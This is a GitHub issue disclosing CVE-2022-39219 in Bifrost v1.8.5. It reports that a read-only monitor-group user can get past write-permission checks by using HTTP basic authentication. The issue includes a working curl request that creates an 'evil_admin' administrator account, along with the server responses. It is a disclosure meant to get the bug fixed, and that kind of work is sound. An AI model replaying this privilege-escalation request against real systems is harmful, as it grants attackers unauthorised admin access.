CVE-2022-39219: Use basic auth can bypass write permission limit · Issue #200 · brokercap/Bifrost

Version:

• Bifrost Version: v1.8.5
• Os Version: CentOS Linux release 7.7.1908

Describe the bug
monitor Group only have the read permission use Cookie authentication
If we do write requests, it will forbidden

POST /user/update HTTP/2 Host: 10.134.88.145:21036 Cookie: xgo_cookie=FHSkwpKqJKFTD1eBfQamigKZriYvovGgr-uoTmWNo-U%3D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: https://10.134.88.145:21036 Referer: https://10.134.88.145:21036/user/index Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close

{"UserName":"evil_admin","Password":"passwd","Group":"administrator","Host":""}

response

HTTP/2 200 OK Content-Type: text/plain; charset=utf-8 Content-Length: 71 Date: Wed, 14 Sep 2022 03:32:50 GMT

{"status":-1,"msg":"user group : [ monitor ] no authority","data":null}

If we use HTTP basic authentication, we can bypass it

curl -u tari:tari -k -X POST -H “Content-Type: application/json” https://10.134.88.145:21036/user/update -d ‘{"UserName":"evil_admin","Password":"passwd","Group":"administrator","Host":""}’

response

{"status":1,"msg":"success","data":null}

Expected behavior
If we do a write action request use a monitor Group role with HTTP basic authentication, it also should have forbidden

Additional context
The problem code is in https://github.com/brokercap/Bifrost/blob/master/admin/controller/common.go#L46
if we use basic authentication, it will not check checkWriteRequest